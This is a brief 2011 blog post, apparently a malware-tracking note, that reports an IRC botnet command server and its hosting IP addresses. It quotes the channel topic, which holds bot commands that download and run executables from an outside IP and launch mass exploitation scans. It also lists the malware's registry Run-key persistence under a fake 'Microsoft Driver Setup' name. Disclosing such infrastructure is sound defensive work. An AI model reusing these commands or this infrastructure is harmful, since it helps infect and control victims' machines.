hahahaha.ishtiben.com(botnet hosted in China Beijing Chinanet Jiangxi Province Network)

By Pig, April 5, 2011

botnet C&C irc
hahahaha.ishtiben.com DNS_TYPE_A 60.190.218.104 123.183.217.32 59.63.157.62
60.190.218.104:7196

Now talking in #!
Topic is ‘.asc -S|.http http://194.28.44.208/new1.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a|.r.getfile -S|.r.getfile http://194.28.44.208/m.exe C:xdx.exe 1 -s’

HKLM​SOFTWARE​Microsoft​Windows​CurrentVer!​policies​Explorer​Run​
Microsoft Driver Setup
C:​WINDOWS​ghdrive32.exe
HKLM​SOFTWARE​Microsoft​Windows​CurrentVersion​Run​
Microsoft Driver Setup
C:​WINDOWS​ghdrive32.exe

Process Created
“C:WINDOWSghdrive32.exe”

infos about hosting:
http://whois.domaintools.com/59.63.157.62

Categories: Uncategorized